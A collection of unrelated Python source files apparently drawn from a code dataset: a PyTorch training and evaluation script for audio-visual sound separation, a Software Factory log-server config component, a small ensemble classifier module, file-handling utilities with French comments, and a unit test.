mix_wav = istft_reconstruction(mag_mix[j, 0], phase_mix[j, 0], hop_length=args.stft_hop)
# save each component
preds_wav = [None for n in range(N)]
for n in range(N):
# Predicted audio recovery
pred_mag = mag_mix[j, 0] * pred_masks_linear[n][j, 0]
preds_wav[n] = istft_reconstruction(pred_mag, phase_mix[j, 0], hop_length=args.stft_hop)
# separation performance computes
L = preds_wav[0].shape[0]
gts_wav = [None for n in range(N)]
valid = True
for n in range(N):
gts_wav[n] = audios[n][j, 0:L].numpy()
valid *= np.sum(np.abs(gts_wav[n])) > 1e-5
valid *= np.sum(np.abs(preds_wav[n])) > 1e-5
if valid:
sdr, sir, sar, _ = bss_eval_sources(
np.asarray(gts_wav),
np.asarray(preds_wav),
False)
sdr_mix, _, _, _ = bss_eval_sources(
np.asarray(gts_wav),
np.asarray([mix_wav[0:L] for n in range(N)]),
False)
sdr_mix_meter.update(sdr_mix.mean())
sdr_meter.update(sdr.mean())
sir_meter.update(sir.mean())
sar_meter.update(sar.mean())
return [sdr_mix_meter.average(),
sdr_meter.average(),
sir_meter.average(),
sar_meter.average()]
# Visualize predictions
def output_visuals_PosNeg(vis_rows, batch_data, masks_pos, masks_neg, idx_pos, idx_neg, pred_masks_, gt_masks_, mag_mix_, weight_, args):
mag_mix = batch_data['mag_mix']
phase_mix = batch_data['phase_mix']
frames = batch_data['frames']
infos = batch_data['infos']
# masks to cpu, numpy
masks_pos = torch.squeeze(masks_pos, dim=1)
masks_pos = masks_pos.cpu().float().numpy()
masks_neg = torch.squeeze(masks_neg, dim=1)
masks_neg = masks_neg.cpu().float().numpy()
N = args.num_mix
B = mag_mix.size(0)
pred_masks_linear = [None for n in range(N)]
gt_masks_linear = [None for n in range(N)]
for n in range(N):
if args.log_freq:
grid_unwarp = torch.from_numpy(
warpgrid(B, args.stft_frame//2+1, gt_masks_[0].size(3), warp=False)).to(args.device)
pred_masks_linear[n] = F.grid_sample(pred_masks_[n], grid_unwarp)
gt_masks_linear[n] = F.grid_sample(gt_masks_[n], grid_unwarp)
else:
pred_masks_linear[n] = pred_masks_[n]
gt_masks_linear[n] = gt_masks_[n]
# convert into numpy
mag_mix = mag_mix.numpy()
mag_mix_ = mag_mix_.detach().cpu().numpy()
phase_mix = phase_mix.numpy()
weight_ = weight_.detach().cpu().numpy()
idx_pos = int(idx_pos.detach().cpu().numpy())
idx_neg = int(idx_neg.detach().cpu().numpy())
for n in range(N):
pred_masks_[n] = pred_masks_[n].detach().cpu().numpy()
pred_masks_linear[n] = pred_masks_linear[n].detach().cpu().numpy()
gt_masks_[n] = gt_masks_[n].detach().cpu().numpy()
gt_masks_linear[n] = gt_masks_linear[n].detach().cpu().numpy()
# threshold if binary mask
if args.binary_mask:
pred_masks_[n] = (pred_masks_[n] > args.mask_thres).astype(np.float32)
pred_masks_linear[n] = (pred_masks_linear[n] > args.mask_thres).astype(np.float32)
threshold = 0.5
# loop over each sample
for j in range(B):
row_elements = []
# video names
prefix = []
for n in range(N):
prefix.append('-'.join(infos[n][0][j].split('/')[-2:]).split('.')[0])
prefix = '+'.join(prefix)
makedirs(os.path.join(args.vis, prefix))
# save mixture
mix_wav = istft_reconstruction(mag_mix[j, 0], phase_mix[j, 0], hop_length=args.stft_hop)
mix_amp = magnitude2heatmap(mag_mix_[j, 0])
weight = magnitude2heatmap(weight_[j, 0], log=False, scale=100.)
filename_mixwav = os.path.join(prefix, 'mix.wav')
filename_mixmag = os.path.join(prefix, 'mix.jpg')
filename_weight = os.path.join(prefix, 'weight.jpg')
matplotlib.image.imsave(os.path.join(args.vis, filename_mixmag), mix_amp[::-1, :, :])
matplotlib.image.imsave(os.path.join(args.vis, filename_weight), weight[::-1, :])
wavfile.write(os.path.join(args.vis, filename_mixwav), args.audRate, mix_wav)
row_elements += [{'text': prefix}, {'image': filename_mixmag, 'audio': filename_mixwav}]
# save each component
preds_wav = [None for n in range(N)]
for n in range(N):
# GT and predicted audio recovery
gt_mag = mag_mix[j, 0] * gt_masks_linear[n][j, 0]
gt_mag_ = mag_mix_[j, 0] * gt_masks_[n][j, 0]
gt_wav = istft_reconstruction(gt_mag, phase_mix[j, 0], hop_length=args.stft_hop)
pred_mag = mag_mix[j, 0] * pred_masks_linear[n][j, 0]
pred_mag_ = mag_mix_[j, 0] * pred_masks_[n][j, 0]
preds_wav[n] = istft_reconstruction(pred_mag, phase_mix[j, 0], hop_length=args.stft_hop)
# output masks
filename_gtmask = os.path.join(prefix, 'gtmask{}.jpg'.format(n+1))
filename_predmask = os.path.join(prefix, 'predmask{}.jpg'.format(n+1))
gt_mask = (np.clip(gt_masks_[n][j, 0], 0, 1) * 255).astype(np.uint8)
pred_mask = (np.clip(pred_masks_[n][j, 0], 0, 1) * 255).astype(np.uint8)
matplotlib.image.imsave(os.path.join(args.vis, filename_gtmask), gt_mask[::-1, :])
matplotlib.image.imsave(os.path.join(args.vis, filename_predmask), pred_mask[::-1, :])
# ouput spectrogram (log of magnitude, show colormap)
filename_gtmag = os.path.join(prefix, 'gtamp{}.jpg'.format(n+1))
filename_predmag = os.path.join(prefix, 'predamp{}.jpg'.format(n+1))
gt_mag = magnitude2heatmap(gt_mag_)
pred_mag = magnitude2heatmap(pred_mag_)
matplotlib.image.imsave(os.path.join(args.vis, filename_gtmag), gt_mag[::-1, :, :])
matplotlib.image.imsave(os.path.join(args.vis, filename_predmag), pred_mag[::-1, :, :])
# output audio
filename_gtwav = os.path.join(prefix, 'gt{}.wav'.format(n+1))
filename_predwav = os.path.join(prefix, 'pred{}.wav'.format(n+1))
wavfile.write(os.path.join(args.vis, filename_gtwav), args.audRate, gt_wav)
wavfile.write(os.path.join(args.vis, filename_predwav), args.audRate, preds_wav[n])
# save frame
frames_tensor = recover_rgb(frames[idx_pos][j,:,int(args.num_frames//2)])
frames_tensor = np.asarray(frames_tensor)
filename_frame = os.path.join(prefix, 'frame{}.png'.format(idx_pos+1))
matplotlib.image.imsave(os.path.join(args.vis, filename_frame), frames_tensor)
frame = frames_tensor.copy()
# get heatmap and overlay for postive pair
height, width = masks_pos.shape[-2:]
heatmap = np.zeros((height*16, width*16))
for i in range(height):
for k in range(width):
mask_pos = masks_pos[j]
value = mask_pos[i,k]
value = 0 if value < threshold else value
ii = i * 16
jj = k * 16
heatmap[ii:ii + 16, jj:jj + 16] = value
heatmap = (heatmap * 255).astype(np.uint8)
filename_heatmap = os.path.join(prefix, 'heatmap_{}_{}.jpg'.format(idx_pos+1, idx_pos+1))
plt.imsave(os.path.join(args.vis, filename_heatmap), heatmap, cmap='hot')
heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)
fin = cv2.addWeighted(heatmap, 0.5, frame, 0.5, 0, dtype = cv2.CV_32F)
path_overlay = os.path.join(args.vis, prefix, 'overlay_{}_{}.jpg'.format(idx_pos+1, idx_pos+1))
cv2.imwrite(path_overlay, fin)
# save frame
frames_tensor = recover_rgb(frames[idx_neg][j,:,int(args.num_frames//2)])
frames_tensor = np.asarray(frames_tensor)
filename_frame = os.path.join(prefix, 'frame{}.png'.format(idx_neg+1))
matplotlib.image.imsave(os.path.join(args.vis, filename_frame), frames_tensor)
frame = frames_tensor.copy()
# get heatmap and overlay for postive pair
height, width = masks_neg.shape[-2:]
heatmap = np.zeros((height*16, width*16))
for i in range(height):
for k in range(width):
mask_neg = masks_neg[j]
value = mask_neg[i,k]
value = 0 if value < threshold else value
ii = i * 16
jj = k * 16
heatmap[ii:ii + 16, jj:jj + 16] = value
heatmap = (heatmap * 255).astype(np.uint8)
filename_heatmap = os.path.join(prefix, 'heatmap_{}_{}.jpg'.format(idx_pos+1, idx_neg+1))
plt.imsave(os.path.join(args.vis, filename_heatmap), heatmap, cmap='hot')
heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)
fin = cv2.addWeighted(heatmap, 0.5, frame, 0.5, 0, dtype = cv2.CV_32F)
path_overlay = os.path.join(args.vis, prefix, 'overlay_{}_{}.jpg'.format(idx_pos+1, idx_neg+1))
cv2.imwrite(path_overlay, fin)
vis_rows.append(row_elements)
def evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader, history, epoch, args):
print('Evaluating at {} epochs...'.format(epoch))
torch.set_grad_enabled(False)
# remove previous viz results
makedirs(args.vis, remove=False)
# switch to eval mode
netWrapper1.eval()
netWrapper2.eval()
netWrapper3.eval()
# initialize meters
loss_meter = AverageMeter()
loss_acc_meter = AverageMeter()
loss_sep_meter = AverageMeter()
loss_loc_meter = AverageMeter()
sdr_mix_meter = AverageMeter()
sdr_meter = AverageMeter()
sir_meter = AverageMeter()
sar_meter = AverageMeter()
vis_rows = []
for i, batch_data in enumerate(loader):
mag_mix = batch_data['mag_mix']
mags = batch_data['mags']
frames = batch_data['frames']
N = args.num_mix
B = mag_mix.shape[0]
for n in range(N):
frames[n] = torch.autograd.Variable(frames[n]).to(args.device)
mags[n] = torch.autograd.Variable(mags[n]).to(args.device)
mag_mix = torch.autograd.Variable(mag_mix).to(args.device)
# forward pass
# return feat_sound
feat_sound, outputs = netWrapper1.forward(mags, mag_mix, args)
gt_masks = outputs['gt_masks']
mag_mix_ = outputs['mag_mix']
weight_ = outputs['weight']
# return feat_frame, and emb_frame
feat_frame, emb_frame = netWrapper2.forward(frames, args)
# random select positive/negative pairs
idx_pos = torch.randint(0,N, (1,))
idx_neg = N -1 -idx_pos
# appearance attention
masks = netWrapper3.forward(feat_frame, emb_frame[idx_pos], args)
mask_pos = masks[idx_pos]
mask_neg = masks[idx_neg]
# max pooling
pred_pos = F.adaptive_max_pool2d(mask_pos, 1)
pred_pos = pred_pos.view(mask_pos.shape[0])
pred_neg = F.adaptive_max_pool2d(mask_neg, 1)
pred_neg = pred_neg.view(mask_neg.shape[0])
# ground truth for the positive/negative pairs
y1 = torch.ones(B,device=args.device).detach()
y0 = torch.zeros(B, device=args.device).detach()
# localization loss
loss_loc_pos = crit_loc(pred_pos, y1).reshape(1)
loss_loc_neg = crit_loc(pred_neg, y0).reshape(1)
loss_loc = args.lamda * (loss_loc_pos + loss_loc_neg)/N
# Calculate val accuracy
pred_pos = (pred_pos > args.mask_thres)
pred_neg = (pred_neg > args.mask_thres)
valacc = 0
for j in range(B):
if pred_pos[j].item() == y1[j].item():
valacc += 1.0
if pred_neg[j].item() == y0[j].item():
valacc += 1.0
valacc = valacc/N/B
# sepatate sounds
sound_size = feat_sound.size()
B, C = sound_size[0], sound_size[1]
pred_masks = [None for n in range(N)]
for n in range(N):
feat_img = emb_frame[n]
feat_img = feat_img.view(B, 1, C)
pred_masks[n] = torch.bmm(feat_img, feat_sound.view(B, C, -1)) \
.view(B, 1, *sound_size[2:])
pred_masks[n] = activate(pred_masks[n], args.output_activation)
# separatioon loss
loss_sep = crit_sep(pred_masks, gt_masks, weight_).reshape(1)
# total loss
loss = loss_loc + loss_sep
loss_meter.update(loss.item())
loss_acc_meter.update(valacc)
loss_sep_meter.update(loss_sep.item())
loss_loc_meter.update(loss_loc.item())
print('[Eval] iter {}, loss: {:.4f}, loss_loc: {:.4f}, loss_sep: {:.4f}, acc: {:.4f} '.format(i, loss.item(), loss_loc.item(), loss_sep.item(), valacc))
# calculate metrics
sdr_mix, sdr, sir, sar = calc_metrics(batch_data, pred_masks, args)
sdr_mix_meter.update(sdr_mix)
sdr_meter.update(sdr)
sir_meter.update(sir)
sar_meter.update(sar)
# output visualization
if len(vis_rows) < args.num_vis:
output_visuals_PosNeg(vis_rows, batch_data, mask_pos, mask_neg, idx_pos, idx_neg, pred_masks, gt_masks, mag_mix_, weight_, args)
print('[Eval Summary] Epoch: {}, Loss: {:.4f}, Loss_loc: {:.4f}, Loss_sep: {:.4f}, acc: {:.4f}, sdr_mix: {:.4f}, sdr: {:.4f}, sir: {:.4f}, sar: {:.4f}, '
.format(epoch, loss_meter.average(), loss_loc_meter.average(), loss_sep_meter.average(), loss_acc_meter.average(), sdr_mix_meter.average(), sdr_meter.average(), sir_meter.average(), sar_meter.average()))
history['val']['epoch'].append(epoch)
history['val']['err'].append(loss_meter.average())
history['val']['err_loc'].append(loss_loc_meter.average())
history['val']['err_sep'].append(loss_sep_meter.average())
history['val']['acc'].append(loss_acc_meter.average())
history['val']['sdr'].append(sdr_meter.average())
history['val']['sir'].append(sir_meter.average())
history['val']['sar'].append(sar_meter.average())
# Plot figure
if epoch > 0:
print('Plotting figures...')
plot_loss_loc_sep_acc_metrics(args.ckpt, history)
print('this evaluation round is done!')
# train one epoch
def train(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader, optimizer, history, epoch, args):
print('Training at {} epochs...'.format(epoch))
torch.set_grad_enabled(True)
batch_time = AverageMeter()
data_time = AverageMeter()
# switch to train mode
netWrapper1.train()
netWrapper2.train()
netWrapper3.train()
# main loop
torch.cuda.synchronize()
tic = time.perf_counter()
for i, batch_data in enumerate(loader):
mag_mix = batch_data['mag_mix']
mags = batch_data['mags']
frames = batch_data['frames']
N = args.num_mix
B = mag_mix.shape[0]
for n in range(N):
frames[n] = torch.autograd.Variable(frames[n]).to(args.device)
mags[n] = torch.autograd.Variable(mags[n]).to(args.device)
mag_mix = torch.autograd.Variable(mag_mix).to(args.device)
# forward pass
optimizer.zero_grad()
# return feat_sound
feat_sound, outputs = netWrapper1.forward(mags, mag_mix, args)
gt_masks = outputs['gt_masks']
mag_mix_ = outputs['mag_mix']
weight_ = outputs['weight']
# return feat_frame, and emb_frame
feat_frame, emb_frame = netWrapper2.forward(frames, args)
# random select positive/negative pairs
idx_pos = torch.randint(0,N, (1,))
idx_neg = N -1 -idx_pos
# appearance attention
masks = netWrapper3.forward(feat_frame, emb_frame[idx_pos], args)
mask_pos = masks[idx_pos]
mask_neg = masks[idx_neg]
# max pooling
pred_pos = F.adaptive_max_pool2d(mask_pos, 1)
pred_pos = pred_pos.view(mask_pos.shape[0])
pred_neg = F.adaptive_max_pool2d(mask_neg, 1)
pred_neg = pred_neg.view(mask_neg.shape[0])
# ground truth for the positive/negative pairs
y1 = torch.ones(B,device=args.device).detach()
y0 = torch.zeros(B, device=args.device).detach()
# localization loss and acc
loss_loc_pos = crit_loc(pred_pos, y1).reshape(1)
loss_loc_neg = crit_loc(pred_neg, y0).reshape(1)
loss_loc = args.lamda * (loss_loc_pos + loss_loc_neg)/N
pred_pos = (pred_pos > args.mask_thres)
pred_neg = (pred_neg > args.mask_thres)
valacc = 0
for j in range(B):
if pred_pos[j].item() == y1[j].item():
valacc += 1.0
if pred_neg[j].item() == y0[j].item():
valacc += 1.0
valacc = valacc/N/B
# sepatate sounds (for simplicity, we don't use the alpha and beta)
sound_size = feat_sound.size()
B, C = sound_size[0], sound_size[1]
pred_masks = [None for n in range(N)]
for n in range(N):
feat_img = emb_frame[n]
feat_img = feat_img.view(B, 1, C)
pred_masks[n] = torch.bmm(feat_img, feat_sound.view(B, C, -1)) \
.view(B, 1, *sound_size[2:])
pred_masks[n] = activate(pred_masks[n], args.output_activation)
# separation loss
loss_sep = crit_sep(pred_masks, gt_masks, weight_).reshape(1)
# total loss
loss = loss_loc + loss_sep
loss.backward()
optimizer.step()
# measure total time
torch.cuda.synchronize()
batch_time.update(time.perf_counter() - tic)
tic = time.perf_counter()
# display
if i % args.disp_iter == 0:
print('Epoch: [{}][{}/{}], Time: {:.2f}, Data: {:.2f}, '
'lr_sound: {}, lr_frame: {}, lr_avol: {}, '
'loss: {:.5f}, loss_loc: {:.5f}, loss_sep: {:.5f}, acc: {:.5f} '
.format(epoch, i, args.epoch_iters,
batch_time.average(), data_time.average(),
args.lr_sound, args.lr_frame, args.lr_avol,
loss.item(), loss_loc.item(), loss_sep.item(),
valacc))
fractional_epoch = epoch - 1 + 1. * i / args.epoch_iters
history['train']['epoch'].append(fractional_epoch)
history['train']['err'].append(loss.item())
history['train']['err_loc'].append(loss_loc.item())
history['train']['err_sep'].append(loss_sep.item())
history['train']['acc'].append(valacc)
def checkpoint(net_sound, net_frame, net_avol, optimizer, history, epoch, args):
print('Saving checkpoints at {} epochs.'.format(epoch))
suffix_latest = 'latest.pth'
suffix_best = 'best.pth'
state = {'epoch': epoch, \
'state_dict_net_sound': net_sound.state_dict(), \
'state_dict_net_frame': net_frame.state_dict(),\
'state_dict_net_avol': net_avol.state_dict(),\
'optimizer': optimizer.state_dict(), \
'history': history, }
torch.save(state, '{}/checkpoint_{}'.format(args.ckpt, suffix_latest))
cur_err = history['val']['err'][-1]
if cur_err <= args.best_err:
args.best_err = cur_err
torch.save(state, '{}/checkpoint_{}'.format(args.ckpt, suffix_best))
def load_checkpoint(net_sound, net_frame, net_avol, optimizer, history, filename):
start_epoch = 0
if os.path.isfile(filename):
print("=> loading checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
start_epoch = checkpoint['epoch'] + 1
net_sound.load_state_dict(checkpoint['state_dict_net_sound'])
net_frame.load_state_dict(checkpoint['state_dict_net_frame'])
net_avol.load_state_dict(checkpoint['state_dict_net_avol'])
optimizer.load_state_dict(checkpoint['optimizer'])
for state in optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.cuda()
history = checkpoint['history']
print("=> loaded checkpoint '{}' (epoch {})"
.format(filename, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(filename))
return net_sound, net_frame, net_avol, optimizer, start_epoch, history
def load_checkpoint_from_train(net_sound, net_frame, net_avol, filename):
if os.path.isfile(filename):
print("=> loading checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
print('epoch: ', checkpoint['epoch'])
net_sound.load_state_dict(checkpoint['state_dict_net_sound'])
net_frame.load_state_dict(checkpoint['state_dict_net_frame'])
net_avol.load_state_dict(checkpoint['state_dict_net_avol'])
else:
print("=> no checkpoint found at '{}'".format(filename))
return net_sound, net_frame, net_avol
def load_sep(net_sound, net_frame, filename):
if os.path.isfile(filename):
print("=> loading checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
print('epoch: ', checkpoint['epoch'])
net_sound.load_state_dict(checkpoint['state_dict_net_sound'])
net_frame.load_state_dict(checkpoint['state_dict_net_frame'])
else:
print("=> no checkpoint found at '{}'".format(filename))
return net_sound, net_frame
def create_optimizer(net_sound, net_frame, net_avol, args):
param_groups = [{'params': net_sound.parameters(), 'lr': args.lr_frame},
{'params': net_frame.parameters(), 'lr': args.lr_sound},
{'params': net_avol.parameters(), 'lr': args.lr_avol}]
return torch.optim.SGD(param_groups, momentum=args.beta1, weight_decay=args.weight_decay)
def adjust_learning_rate(optimizer, args):
args.lr_sound *= 0.1
args.lr_frame *= 0.1
args.lr_avol *= 0.1
for param_group in optimizer.param_groups:
param_group['lr'] *= 0.1
def main(args):
# Network Builders
torch.manual_seed(0)
torch.cuda.manual_seed(0)
np.random.seed(0)
random.seed(0)
builder = ModelBuilder()
net_sound = builder.build_sound(
arch=args.arch_sound,
input_channel=1,
output_channel=args.num_channels,
fc_dim=args.num_channels,
weights=args.weights_sound)
net_frame = builder.build_frame(
arch=args.arch_frame,
fc_dim=args.num_channels,
pool_type=args.img_pool,
weights=args.weights_frame)
net_avol = builder.build_avol(
arch=args.arch_avol,
fc_dim=args.num_channels,
weights=args.weights_frame)
crit_loc = nn.BCELoss()
crit_sep = builder.build_criterion(arch=args.loss)
# Dataset and Loader
dataset_train = MUSICMixDataset(
args.list_train, args, split='train')
dataset_val = MUSICMixDataset(
args.list_val, args, max_sample=args.num_val, split='val')
loader_train = torch.utils.data.DataLoader(
dataset_train,
batch_size=args.batch_size,
shuffle=True,
num_workers=int(args.workers),
drop_last=True)
loader_val = torch.utils.data.DataLoader(
dataset_val,
batch_size=args.batch_size,
shuffle=False,
num_workers=int(args.workers),
drop_last=False)
args.epoch_iters = len(dataset_train) // args.batch_size
print('1 Epoch = {} iters'.format(args.epoch_iters))
# Set up optimizer
optimizer = create_optimizer(net_sound, net_frame, net_avol, args)
# History of peroformance
history = {
'train': {'epoch': [], 'err': [], 'err_loc': [], 'err_sep': [], 'acc': []},
'val': {'epoch': [], 'err': [], 'err_loc': [], 'err_sep': [], 'acc': [], 'sdr': [], 'sir': [], 'sar': []}}
# Training loop
# Load from pretrained models
start_epoch = 1
model_name = args.ckpt + '/checkpoint.pth'
if os.path.exists(model_name):
if args.mode == 'eval':
net_sound, net_frame, net_avol = load_checkpoint_from_train(net_sound, net_frame, net_avol, model_name)
elif args.mode == 'train':
model_name = args.ckpt + '/checkpoint_latest.pth'
net_sound, net_frame, net_avol, optimizer, start_epoch, history = load_checkpoint(net_sound, net_frame, net_avol, optimizer, history, model_name)
print("Loading from previous checkpoint.")
else:
if args.mode == 'train' and start_epoch==1 and os.path.exists(args.weights_model):
net_sound, net_frame = load_sep(net_sound, net_frame, args.weights_model)
print("Loading from appearance + sound checkpoint.")
# Wrap networks
netWrapper1 = NetWrapper1(net_sound)
netWrapper1 = torch.nn.DataParallel(netWrapper1, device_ids=range(args.num_gpus)).cuda()
netWrapper1.to(args.device)
netWrapper2 = NetWrapper2(net_frame)
netWrapper2 = torch.nn.DataParallel(netWrapper2, device_ids=range(args.num_gpus)).cuda()
netWrapper2.to(args.device)
netWrapper3 = NetWrapper3(net_avol)
netWrapper3 = torch.nn.DataParallel(netWrapper3, device_ids=range(args.num_gpus)).cuda()
netWrapper3.to(args.device)
# Eval mode
#evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, 0, args)
if args.mode == 'eval':
evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, 0, args)
print('Evaluation Done!')
return
for epoch in range(start_epoch, args.num_epoch + 1):
train(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_train, optimizer, history, epoch, args)
# drop learning rate
if epoch in args.lr_steps:
adjust_learning_rate(optimizer, args)
## Evaluation and visualization
if epoch % args.eval_epoch == 0:
evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, epoch, args)
# checkpointing
checkpoint(net_sound, net_frame, net_avol, optimizer, history, epoch, args)
print('Training Done!')
if __name__ == '__main__':
# arguments
parser = ArgParser()
args = parser.parse_train_arguments()
args.batch_size = args.num_gpus * args.batch_size_per_gpu
args.device = torch.device("cuda")
# experiment name
if args.mode == 'train':
args.id += '-{}mix'.format(args.num_mix)
if args.log_freq:
args.id += '-LogFreq'
args.id += '-{}-{}-{}'.format(
args.arch_frame, args.arch_sound, args.arch_avol)
args.id += '-frames{}stride{}'.format(args.num_frames, args.stride_frames)
args.id += '-{}'.format(args.img_pool)
if args.binary_mask:
assert args.loss == 'bce', 'Binary Mask should go with BCE loss'
args.id += '-binary'
else:
args.id += '-ratio'
if args.weighted_loss:
args.id += '-weightedLoss'
args.id += '-channels{}'.format(args.num_channels)
args.id += '-epoch{}'.format(args.num_epoch)
args.id += '-step' + '_'.join([str(x) for x in args.lr_steps])
print('Model ID: {}'.format(args.id))
# paths to save/load output
args.ckpt = os.path.join(args.ckpt, args.id)
if args.mode == 'train':
args.weights_model = 'ckpt_res50_DV3P_MUSIC_N2_f1_binary_bs10_TrainS335_D65_ValValS100_ValTestS130_dup100_f8fps_11k/MUSIC-2mix-LogFreq-resnet18dilated_50-deeplabV3Plus_mobilenetv2-frames1stride24-maxpool-binary-weightedLoss-channels11-epoch100-step40_80/checkpoint.pth'
args.vis = os.path.join(args.ckpt, 'visualization_train/')
makedirs(args.ckpt, remove=False)
elif args.mode == 'eval':
args.vis = os.path.join(args.ckpt, 'visualization_val/')
elif args.mode == 'test':
args.vis = os.path.join(args.ckpt, 'visualization_test/')
# initialize best error with a big number
args.best_err = float("inf")
random.seed(args.seed)
torch.manual_seed(args.seed)
main(args)
|
StarcoderdataPython
|
166596
|
<reponame>softwarefactory-project/sf-conf
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sfconfig.components import Component
class LogServer(Component):
def prepare(self, args):
super(LogServer, self).prepare(args)
args.glue["loguser_authorized_keys"] = []
def configure(self, args, host):
self.get_or_generate_ssh_key(args, "zuul_logserver_rsa")
args.glue["logservers"].append({
"name": "sflogs",
"host": args.glue["logserver_host"],
"user": "loguser",
"path": "/var/www/logs",
})
if args.glue["logserver_host"] != args.glue["install_server_host"]:
args.glue.setdefault("zuul_ssh_known_hosts", []).append({
"host_packed": args.glue["logserver_host"],
"host": args.glue["logserver_host"],
"port": 22
})
args.glue["logs_expiry"] = args.sfconfig["logs"]["expiry"]
args.glue["loguser_authorized_keys"].append(
args.glue["zuul_logserver_rsa_pub"])
# When logserver is hosted on the gateway, we can use fqdn instead
args.glue["logserver_hostname"] = args.glue["logserver_host"]
if args.glue["logserver_host"] == args.glue["gateway_host"]:
args.glue["logserver_hostname"] = args.sfconfig["fqdn"]
|
StarcoderdataPython
|
120751
|
<reponame>continual-ml/forgetful-networks<filename>model.py<gh_stars>0
import torch
import torch.nn as nn
def make_processor(in_dim: int, out_dim: int) -> nn.Module:
return nn.Sequential(
nn.Linear(in_dim, 128),
nn.LeakyReLU(0.2),
nn.Linear(128, 32),
nn.LeakyReLU(0.2),
nn.Linear(32, out_dim)
)
def freeze(module: nn.Module, state: bool=True) -> None:
for param in module.parameters():
param.requires_grad_(not state)
class Frozen(nn.Module):
def __init__(self, module: nn.Module) -> None:
super(Frozen, self).__init__()
self._module = module
def forward(self, x):
freeze(self._module, True)
result = self._module(x)
freeze(self._module, False)
return result
class Classifier(nn.Module):
def __init__(self, processor: nn.Module, head: nn.Module) -> None:
super(Classifier, self).__init__()
self._processor = processor
self._decision = head
def forward(self, img: torch.Tensor) -> torch.Tensor:
return self._decision(self._processor(img))
class Ensemble(nn.Module):
def __init__(self, processors: list, classifier) -> None:
super(Ensemble, self).__init__()
self._processors = processors # unregistered parameters
self._classifier = classifier
def forward(self, img: torch.Tensor) -> tuple:
processed = torch.cat([
p(img).unsqueeze(0) for p in self._processors
], dim=0)
avg = processed.mean(dim=0)
std = processed.std(dim=0).sum(dim=1)
y_pred = torch.sigmoid(self._classifier(avg))
return y_pred, std
|
StarcoderdataPython
|
3250386
|
""" Gestion de fichiers """
from log_generator.exit_program import exitProgram
from zipfile import ZipFile
import os.path
import shutil
# Verification de la presence du fichier
def file_exist_check(file_with_path:str):
status:bool = False
try:
status = os.path.exists(file_with_path)
except OSError:
print("File handler: Check file exist: " + file_with_path + " fichier non trouve")
return status
# Verification de la presence du fichier
def file_exist_check_ifNot_exit(file_with_path:str):
try:
status = os.path.exists(file_with_path)
if not status:
print("File handler: Check file exist: " + file_with_path + " fichier non trouve")
exitProgram()
except OSError:
print("File handler: Check file exist: " + file_with_path + " fichier non trouve")
exitProgram()
def remove_directory(folder:str):
try:
os.path.isdir(folder)
shutil.rmtree(folder)
except OSError:
print("File handler: problème avec la suppression du repertoire")
exitProgram()
def remove_file(file:str):
try:
os.path.isfile(file)
os.remove(file)
except OSError:
print("File handler: problème avec la suppression du fichier")
exitProgram()
# Deplacer un repertoire
def move_directory(src_path:str, dest_path:str):
try:
#shutil.move(pathFile + myNewFolderName + '/' + 'IP2LOCATION-LITE-DB11.CSV', myPath + 'IP2LOCATION-LITE-DB11.CSV' )
shutil.move(src_path, dest_path)
except:
print("File handler: probleme de deplacement de : " + src_path + " vers " + dest_path)
exitProgram()
# Renommer une archive
def rename_directory(current_folder_name:str, new_folder_name:str):
try:
os.path.isdir(current_folder_name)
os.rename(current_folder_name, new_folder_name)
except:
print("File handler: probleme de renomage de : " + current_folder_name + " en " + new_folder_name)
exitProgram()
# Exraction d un fichier specifique depuis une archive Zip
def extract_a_specified_file_from_zip_archive(archive_path_file_name:str, fileName_to_extract:str, dest_extraction_path:str):
with ZipFile(archive_path_file_name, mode="r") as zip_ref:
try:
zip_ref.extract(fileName_to_extract, dest_extraction_path)
zip_ref.close()
except:
print("File handler: probleme d'extraction de l'archive: " + archive_path_file_name)
exitProgram()
# Verifier que la taille du fichier n est pas nulle
def check_sizeFileNotNull(path_and_file_name:str):
if not os.path.isfile(path_and_file_name) and not os.path.getsize(path_and_file_name) > 0:
print("File handler: le fichier : " + path_and_file_name + " presente une taille de : " + os.path.getsize(path_and_file_name))
exitProgram()
def move_file(src_path_file:str, dest_path_file:str):
try:
shutil.move(src_path_file, dest_path_file)
except:
print("File handler: le fichier " + src_path_file + " deplace vers : " + dest_path_file)
# Ecrire dans le fichier de persistance des logs enseigné par
# l'argument au lancement de la ligne de commande
def write_file(fileNamePath: str, content: str):
try:
file = open(fileNamePath, "a")
file.write(content + "\n")
except OSError:
print("File handler: Impossible decrire dans le fichier " + fileNamePath)
exitProgram()
# Lire un fichier texte
def read_file(filename:str):
try:
with open(filename, "r") as fileToRead:
line = fileToRead.readline()
except IOError:
print("file_handler: impossible d'ouvrir le fichier pour la lecture: " + filename)
exitProgram()
return line
|
StarcoderdataPython
|
29255
|
<filename>test/test_document.py
# test utilities
import unittest
from decimal import Decimal
# tested module
import madseq
class Test_Document(unittest.TestCase):
def test_parse_line(self):
parse = madseq.Document.parse_line
Element = madseq.Element
self.assertEqual(list(parse(' \t ')),
[''])
self.assertEqual(list(parse(' \t ! a comment; ! ')),
['! a comment; ! '])
self.assertEqual(list(parse(' use, z=23.23e2; k: z; !')),
['!',
Element(None, 'use', {'z': Decimal('23.23e2')}),
Element('k', 'z', {})])
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1777390
|
# <NAME>
# 10/15/2017
